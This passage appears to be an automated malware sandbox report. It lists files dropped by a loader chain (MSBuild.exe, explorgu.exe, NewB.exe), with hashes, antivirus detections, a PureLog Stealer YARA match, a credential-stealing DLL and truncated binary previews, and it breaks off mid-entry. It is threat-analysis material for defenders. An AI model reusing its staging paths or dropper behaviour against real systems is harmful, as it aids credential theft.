Preview:	MZ@.....................................!..L.!Win64 .EXE...$@...PE..d......f.........."....'.....r.......Qp........@..............................r.....x.3... ..................................................Pp......`p..E...en......F\.h....................................\p.(....................Pp.`............................MPRESS1.@p.......0......................MPRESS2.....Pp.......0..................rsrc....E...`p..F....0.............@..............................................................v2.19....0. ../;.,...p.#..JNy..P..{....I..W._...d......N. ^f.3...u...J......=.K\3.p...1....L.a...y.!.....}.\|.......1..K.l...Fl'......:..D.yfcOh.p..i.Ki>......d.Yc.C&J.0..P+.....`.M.....R..s.;.n.t.......%.....II4u. .......f_..+...\|.._.!.v.r...d..O..L.G...HZ...`....p.cy..n..........G..Bq.9#Q.......RU.?f.:.....a..'..>G.X{.........g....B(.....X.gu>M~...;...A2..<..........`.*~......pYs..p3g).Yr......n...a.K.i.Nd56.&J.'...r.n...T...Z..F.pK.\|.I$.u..W.Z..A.!....z.o\|.....f<

C:\Users\user\AppData\Local\EqvNTTWJsgdaHBZM2vNGyoMV.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1460)
Category:	dropped
Size (bytes):	7446
Entropy (8bit):	5.422209848736349
Encrypted:	false
SSDEEP:	192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
MD5:	5B423612B36CDE7F2745455C5DD82577
SHA1:	0187C7C80743B44E9E0C193E993294E3B969CC3D
SHA-256:	E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
SHA-512:	C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
Malicious:	false
Reputation:	unknown
Preview:	<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o

C:\Users\user\AppData\Local\EwtRoEOPYdd062EDD7ELX587.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5388160
Entropy (8bit):	6.884124042562601
Encrypted:	false
SSDEEP:	98304:Q0NFR6666666666666666666666666666666x666666666666666fwwwwwwwwwwG:pPMki6zio75L3pf3dedO4keCIwkoYbgm
MD5:	349EAAECEF28C84C2ECECEF96887132F
SHA1:	4910C2D6657D59286E7FD70FFB92AE149FA1AC23
SHA-256:	703A0BC7861484748E44EA94C65B039C1BE533EDCF224047954DE0613873AED5
SHA-512:	D5CC6ED7A639E15F3452D397A7EB3FE2AF652CF9877950AE0A95F6F440FCDEB31DFAA4269DD4079A1A3D7914F8821618566CC1EACACB5053BC3A66246182F6EC
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...zL.f.........."......Z....M.....\|*............@..........................`R.....N.R...@.....................................P........{L...........R..+... R..7..`...............................8q...............................................text....X.......Z.................. ..`.rdata.......p.......^..............@..@.data....4...P.......8..............@....tls.................V..............@....rsrc....{L......\|L..X..............@..@.reloc...7... R..8....Q.............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\GbMT76fl6mAPfbFsS3x29QL1.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4397448
Entropy (8bit):	7.975616994122795
Encrypted:	false
SSDEEP:	98304:qY0iiOGs4kNz5RsnY94XbhU2588fOMkamQm2P/zAYFx94r:/AOR4kNz52Y2mz+DmQxP/MYFx9+
MD5:	C77688380A61580C30BD94BD9C97C1EB
SHA1:	E1A4CA7BE9DC31B71F0699BD6A4D3254F2CEC948
SHA-256:	5F8F2FCC7527DFDC4D949E086A38E3C0CE1A46D2FDB48A5A2DBEA1295CD0968B
SHA-512:	17673E134B92394A37623007163BEB5F877A056D36F4037DE06A63815BC614009161EE889F3F43EDC083F0C9BEA7BC2FED8B60022D9B0C1981DE41A027EDFC5C
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Virustotal, Detection: 46%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L...?..d.....................8.......i............@..................................C......................................?..P.....................C.............0...8............................)..@............................................text.............................. ..`.rdata..............................@..@.data.......P....?..6..............@....rsrc................*B.............@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\HwwnZ3CpAQLjyKlmGEjpSgAe.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	461825
Entropy (8bit):	7.236344410199689
Encrypted:	false
SSDEEP:	6144:D6k7Z5ysHkE/g5dUlUjnwuhDBOT83WqF18VmfEhglcQ78N3No:uIDymkE/MdGGnwsDEgGM8o1zwN9o
MD5:	AF2E668BC00063EB9E5B60BE6A127471
SHA1:	7BCDA8AF4AF5256C5CA96B7CC023EA34A476DD48
SHA-256:	5F9CA0C9DD86870D4A73C89F9BF8613116050DB4A041D9F15B1939C9FA4DDA1F
SHA-512:	0F426972949DB6069123AC75A047D7D70C7B61EA40A04090C65CF7EEFE784F870ED8C961B915514D6053FC84121CB51B20D82D78D734A4F6B6F60680D68BF5AF
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Virustotal, Detection: 44%, Browse
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L...q..c.....................6.......i............@................................9........................................?..P.......i...........................0...8............................)..@............................................text.............................. ..`.rdata..............................@..@.data...h....P.......6..............@....rsrc...i............&..............@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\IA1JiyWIGEvHCZKTDOlZNrXb.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	HTML document, Unicode text, UTF-8 text, with very long lines (1460)
Category:	dropped
Size (bytes):	7446
Entropy (8bit):	5.422209848736349
Encrypted:	false
SSDEEP:	192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
MD5:	5B423612B36CDE7F2745455C5DD82577
SHA1:	0187C7C80743B44E9E0C193E993294E3B969CC3D
SHA-256:	E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
SHA-512:	C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
Malicious:	false
Reputation:	unknown
Preview:	<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o

C:\Users\user\AppData\Local\JgoflcD9Q8N9LvT5krhponwA.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	461825
Entropy (8bit):	7.236343038158279
Encrypted:	false
SSDEEP:	6144:D6k7Z5ysHkE/g5dUlUjnwuhDBOT83WqF18VmfEhglcQ78N3Nv:uIDymkE/MdGGnwsDEgGM8o1zwN9v
MD5:	DC66D8F64F9DE14A95471083A50D5188
SHA1:	E06B3F30A66DFBC6AEFEFE1C624C1A4C3D87971D
SHA-256:	529B02677E4645C0A5700FA22008E6BC122F13249CCBC4A2D70D2B359885EBCA
SHA-512:	731823870519B8F1854E8FA598A832F238D562FD6991625B50DFA3B166C80D985F0A5544B85F39357688FEDB631AEBE1DC8C8EFDB1A779C183A33DD177AA4C55
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L...q..c.....................6.......i............@................................9........................................?..P.......i...........................0...8............................)..@............................................text.............................. ..`.rdata..............................@..@.data...h....P.......6..............@....rsrc...i............&..............@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\KS0KCSisDq7pEmahBFThP4AT.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	461825
Entropy (8bit):	7.236343038158279
Encrypted:	false
SSDEEP:	6144:D6k7Z5ysHkE/g5dUlUjnwuhDBOT83WqF18VmfEhglcQ78N3Nv:uIDymkE/MdGGnwsDEgGM8o1zwN9v
MD5:	DC66D8F64F9DE14A95471083A50D5188
SHA1:	E06B3F30A66DFBC6AEFEFE1C624C1A4C3D87971D
SHA-256:	529B02677E4645C0A5700FA22008E6BC122F13249CCBC4A2D70D2B359885EBCA
SHA-512:	731823870519B8F1854E8FA598A832F238D562FD6991625B50DFA3B166C80D985F0A5544B85F39357688FEDB631AEBE1DC8C8EFDB1A779C183A33DD177AA4C55
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L...q..c.....................6.......i............@................................9........................................?..P.......i...........................0...8............................)..@............................................text.............................. ..`.rdata..............................@..@.data...h....P.......6..............@....rsrc...i............&..............@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\KaHPEM2tjHD1595lRxdfqHsL.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	5388160
Entropy (8bit):	6.884123132404075
Encrypted:	false
SSDEEP:	98304:90NFR6666666666666666666666666666666x666666666666666fwwwwwwwwwwe:WPMki6zio75L3pf3dedO4keCIwkoYbg+
MD5:	5BC28E394A9780D075D0725B9FE2BC41
SHA1:	4745F1ED8BBE8F9D5A56FB22BE309E30714FEE6F
SHA-256:	A4C1D9C2E70E37C53CB9BEC6D913E5A8D570A762F5B494BDC7B3BCE8CFADAC37
SHA-512:	8054A2F42D78C3CC88B63EC750A01CB777CF21D0FA65789422C8B605A13DB19960AA2CE943CAD72E0DD3C4FA5250D30A167FE7449946472FAF1EBC015E449FA1
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...zL.f.........."......Z....M.....\|*............@..........................`R.....f.R...@.....................................P........{L...........R..+... R..7..`...............................8q...............................................text....X.......Z.................. ..`.rdata.......p.......^..............@..@.data....4...P.......8..............@....tls.................V..............@....rsrc....{L......\|L..X..............@..@.reloc...7... R..8....Q.............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\MSGhyVQl8QvU645EqnDaDG5h.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4397448
Entropy (8bit):	7.975616994122795
Encrypted:	false
SSDEEP:	98304:qY0iiOGs4kNz5RsnY94XbhU2588fOMkamQm2P/zAYFx94r:/AOR4kNz52Y2mz+DmQxP/MYFx9+
MD5:	C77688380A61580C30BD94BD9C97C1EB
SHA1:	E1A4CA7BE9DC31B71F0699BD6A4D3254F2CEC948
SHA-256:	5F8F2FCC7527DFDC4D949E086A38E3C0CE1A46D2FDB48A5A2DBEA1295CD0968B
SHA-512:	17673E134B92394A37623007163BEB5F877A056D36F4037DE06A63815BC614009161EE889F3F43EDC083F0C9BEA7BC2FED8B60022D9B0C1981DE41A027EDFC5C
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L...?..d.....................8.......i............@..................................C......................................?..P.....................C.............0...8............................)..@............................................text.............................. ..`.rdata..............................@..@.data.......P....?..6..............@....rsrc................*B.............@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Traffic.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\configurationValue\Traffic.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1281
Entropy (8bit):	5.370111951859942
Encrypted:	false
SSDEEP:	24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
MD5:	12C61586CD59AA6F2A21DF30501F71BD
SHA1:	E6B279DC134544867C868E3FF3C267A06CE340C7
SHA-256:	EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
SHA-512:	B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\alexxxxxxxx.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\1000985001\alexxxxxxxx.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	425
Entropy (8bit):	5.353683843266035
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
MD5:	859802284B12C59DDBB85B0AC64C08F0
SHA1:	4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
SHA-256:	FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
SHA-512:	8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\gold.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\1001053001\gold.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	42
Entropy (8bit):	4.0050635535766075
Encrypted:	false
SSDEEP:	3:QHXMKa/xwwUy:Q3La/xwQ
MD5:	84CFDB4B995B1DBF543B26B86C863ADC
SHA1:	D2F47764908BF30036CF8248B9FF5541E2711FA2
SHA-256:	D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
SHA-512:	485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\4767d2e713f2021e8fe856e3ea638b58[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4397448
Entropy (8bit):	7.975613351986162
Encrypted:	false
SSDEEP:	98304:qY0iiOGs4kNz5RsnY94XbhU2588fOMkamQm2P/zAYFx94x:/AOR4kNz52Y2mz+DmQxP/MYFx90
MD5:	BABAF4A8115EFF2FF0233CBB89D043CC
SHA1:	5DAA1002763E87D09719587E04A3C6A093E95CC6
SHA-256:	5F5FD255D8F6C9172DB3309AE1AAA22C41063A294BB06F178DF74DA6D722C662
SHA-512:	CEC3A6D4912E2A1AA2E93188CDCA5A2B223FFB13D0836C4D6524826604FCED9D82D99E4FFFEAF47443CA78C8004806974844CB9FF5568B8484AE9A6D9C270ABD
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................PE..L...?..d.....................8.......i............@..................................C......................................?..P.....................C.............0...8............................)..@............................................text.............................. ..`.rdata..............................@..@.data.......P....?..6..............@....rsrc................*B.............@..@................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\DocuWorks[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	9374208
Entropy (8bit):	6.341144378360357
Encrypted:	false
SSDEEP:	49152:UJfUsBjuiwj8R2L0SZEGpG0bHMrpZWHyQiyz6y26vDNhsx8dJPxTtja25EHZKeqT:c9KiwgRu09ZWHyQi1yRBEHZ7xUnne8
MD5:	A4AC2EDDA7280DFABFC0E168AD4A0F71
SHA1:	C545CD8C7801F480EA3F311D7AB2FE8B79B8C85B
SHA-256:	EC0949BA67AFA666619EE7906753C470ADAAC94331F67A9D968405C57F3474D4
SHA-512:	915F40C008695D1ECB656E6A54EC79F8A69EFF42B9A33F5060A0EC0B58B80F3493773E229A9DC10855CE457B8AB138B4750541FCCF4EB1196ACA792943BDECD8
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................$..;...... .............@.........................................`... .........................................N.......X.......,.......h{.........................................`..(.......................X............................text.....;.......;.................`.``.data........@;......2;.............@.`..rdata....I...A...I...A.............@.`@.pdata..h{.......\|.................@.0@.xdata..P....`.......B..............@.0@.bss.... ....p........................`..edata..N............P..............@.0@.idata..X............R..............@.0..CRT....p............h..............@.@..tls................j..............@.@..rsrc...,............l..............@.0..reloc.............................@.0B................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\gold[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	315904
Entropy (8bit):	7.989648551677086
Encrypted:	false
SSDEEP:	6144:YsFFiBD/2f50sJknDeebx5pAsqL3N8MYk7ZA9k+AEGYeBTNEV:0ghHunDeebx5U2MYkZDEGYeBTiV
MD5:	818B475B766C54DF6D845CB10B6EEDCF
SHA1:	69BA418B84F5EB0930BA483C8FB1D8416B0B8749
SHA-256:	8CECA5E241D721A22AA11FA5FC0700C394C9C809FC2565458DEDF5C45E99C478
SHA-512:	93371ECE9326B2E88425C01D4F6F7DCC19AE5EE252295D8DDF283BC21AE4F5A72761B0F3AE1204DC85FCD1A11096CCD6C3AF4B9E6A85AD9833E8CB06B85C5CA4
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....^..........."...0.............b2... ........@.. .......................@............`..................................2..O............................ .......1..8............................................ ............... ..H............text...(.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B................A2......H........$.................................................................]....0..#.........i. .......... .............+B.....- ....d....(....(...............+.......(...........o......X.. ....2.....+7. ....... ..............XX.. ....]...................X.. ....2........+f...+T..X ....].....X ....]...........&...................X ....]..........%G....a.R...X......i2....X.....2....................(....n .........%.....(..........0..H.........89.....P......%G ....X.R.P....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2254848
Entropy (8bit):	7.952649397372934
Encrypted:	false
SSDEEP:	49152:dSUl6vD5DxN6HHLJ9tFdK/YhCgDLqs9AcGhAKwXYlkWlTB:dSSwD5DxkCHg/9KwXGkWT
MD5:	DA6F6F980F895340769B6811440D7D23
SHA1:	0113A11E4D6BAC4644B39FF040D1432F9C0F4125
SHA-256:	2EDF1263369007F259A9424DE34B7E050BCEE6D01DA5D1387A405F7FD4F09CCC
SHA-512:	6583CB129A1885199FA04656340011DD049CCEB00DCFAE79268C645CFFC60A9EE3EF1B5ADFD0177E506629F387E696E312E8F21E1FC45657A18C33183DCCF413
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......P.....t...t...t._.w...t._.q...t._.s...t.......t...p...t...w...t...q.O.t._.p...t._.r...t._.u...t...u.4.t..\|}...t..\|t...t..\|....t......t..\|v...t.Rich..t.........PE..L.....f...............'.4...........0X......P....@..........................@X......."...@.........................x.W.L...m........P..P...................h.W...............................W.............................t...@................... . .@.......>..................@....rsrc...P....P.......N..............@....idata .............Z..............@... ............\..............@...vponqxxe..... ?......^..............@...ifnpghhs.....0X......f".............@...................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\sarra[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2241024
Entropy (8bit):	7.950552254133016
Encrypted:	false
SSDEEP:	49152:6SUl6vD5DxN6HHLJFwcQbpwpRj2dmxcot74bAWuup4VbhI2o:6SSwD5DxkyiRidScohEAzjVq
MD5:	28A5CB9903CB53DBD3D62F2DFC44C165
SHA1:	1A22BC4585165B15CF600F742E7E2365437FE7EB
SHA-256:	AD591CAC7A0A3450DD856563E378ACA8926D8653AA4B20E1E6C8A31972404192
SHA-512:	B56E3C89DF7F28D142609CB63D878F458936DBDA3209262A12817061D8A03C54960065E4585A56AEC12D9DCE943F6E49571D163E566B41AB67810C505525D8B3
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......P.....t...t...t._.w...t._.q...t._.s...t.......t...p...t...w...t...q.O.t._.p...t._.r...t._.u...t...u.4.t..\|}...t..\|t...t..\|....t......t..\|v...t.Rich..t.........PE..L.....f...............'.4............W......P....@...........................W.....Cd"...@..........................W.L...^...r....P..X+....................W.............................d.W.............................t...@................... . .@.......>..................@....rsrc...X+...P.......N..............@....idata .............Z..............@... .P..........\..............@...twijjjih......>......^..............@...acsqsreh......W.......".............@...................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\FirstZ[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\1001059001\NewB.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2665984
Entropy (8bit):	6.546705490640015
Encrypted:	false
SSDEEP:	49152:UjBP3/qGrdNJ8VZFhY++Yk/4aLq8wH7mm6qJsSRRjyl:aBPvfrAZF28k/RLbwH7mvcRRjy
MD5:	FFADA57F998ED6A72B6BA2F072D2690A
SHA1:	6857B5F0C40A1CDB0411EB34AA9FE5029BCDB84F
SHA-256:	677F393462E24FB6DBA1A47B39E674F485450F91DEEE6076CCBAD9FD5E05BD12
SHA-512:	1DE77F83A89935BB3FC3772D5190C3827D76A998785D451E2C0D11A0061CFD28F1B96ECCB41B012C76DDDA2021E3333A0A647489AE3C6DAC10CFB8302ABDF33F
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d.....e.........."...........(.....@..........@.............................0)...........`.....................................................<.....).......(.............. ).x...............................(.......8...........@...X............................text...V........................... ..`.rdata...".......$..................@..@.data.....'.......'.................@....pdata........(.......(.............@..@.00cfg........(.......(.............@..@.tls..........(.......(.............@....rsrc.........).......(.............@..@.reloc..x.... ).......(.............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\alexxxxxxxx[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1793536
Entropy (8bit):	7.937675203377117
Encrypted:	false
SSDEEP:	49152:L/eYUVc8uWw3Sg6s8Zep6UXIEgf7WD4GTF:L/eYUW8bwUaPXVgzWMG
MD5:	85A15F080B09ACACE350AB30460C8996
SHA1:	3FC515E60E4CFA5B3321F04A96C7FB463E4B9D02
SHA-256:	3A2006BC835A8FFE91B9EE9206F630B3172F42E090F4E8D90BE620E540F5EF6B
SHA-512:	ADE5E3531DFA1A01E6C2A69DEB2962CBF619E766DA3D6E8E3453F70FF55CCBCBE21381C7B97A53D67E1CA88975F4409B1A42A759E18F806171D29E4C3F250E9F
Malicious:	true
Yara Hits:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\alexxxxxxxx[1].exe, Author: Joe Security
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......e.................T..........Nr... ........@.. ....................................`..................................r..K.......D............................q............................................... ............... ..H............text...TR... ...T.................. ..`.rsrc...D............V..............@..@.reloc...............\..............@..B................0r......H........w..x...........$....&...........................................0..j.......~....:_.........~....(.... .... .... ....s....~....(............~....(....~....(.... ....?....r...ps....z...(......0..$.........r...p......~....(....~....(.........]....0................s.........}.......i..... .......... ...............&........}....8......{.......d.....~....(................{....~....(....s.........o.......o.......o.......o.......o............{....o........:............s

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\cred64[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1285632
Entropy (8bit):	6.460516510065148
Encrypted:	false
SSDEEP:	24576:ZvkQL6YY4wMPSYZofkf0Gh6Pi41+a9uyP5dgg/l+yC7:ZsMPSYcS5wPi095PbgWl
MD5:	92FBDFCCF6A63ACEF2743631D16652A7
SHA1:	971968B1378DD89D59D7F84BF92F16FC68664506
SHA-256:	B4588FEACC183CD5A089F9BB950827B75DF04BD5A6E67C95FF258E4A34AA0D72
SHA-512:	B8EA216D4A59D8858FD4128ABB555F8DCF3ACCA9138E663B488F09DC5200DB6DC11ECC235A355E801145BBBB44D7BEAC6147949D75D78B32FE9CFD2FA200D117
Malicious:	true
